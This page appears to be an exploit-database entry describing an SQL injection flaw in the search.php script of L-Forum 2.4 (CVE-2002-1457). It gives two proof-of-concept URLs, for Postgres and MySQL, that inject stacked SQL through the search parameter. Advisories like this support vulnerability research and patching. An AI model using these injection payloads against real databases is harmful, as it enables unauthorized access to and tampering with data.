[] NeoSense
E X P L O I T S
title author type platform port cve id

Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection

Author: Matthew Murphy
type: webapps
platform: php
port: nan
date_added: 2002-08-14 
date_updated: 2012-10-03 
verified: 1 
codes: CVE-2002-1457;OSVDB-10113 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/5468/info

Reportedly, L-Forum is vulnerable to SQL injection attacks. The vulnerability lies in the file 'search.php'

L-Forum does not properly sanitize user input that is used as part of the search parameter in the 'search.php' file. SQL code may be inserted into the requests and executed by the database server.

Postgres:
http://localhost/search.php?search=a%27%20order%20by%20time%20desc%3b%20[query]

MySQL:
http://localhost/search.php?search=a%25%27%20order%20by%20time%20desc%3b%20[query]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.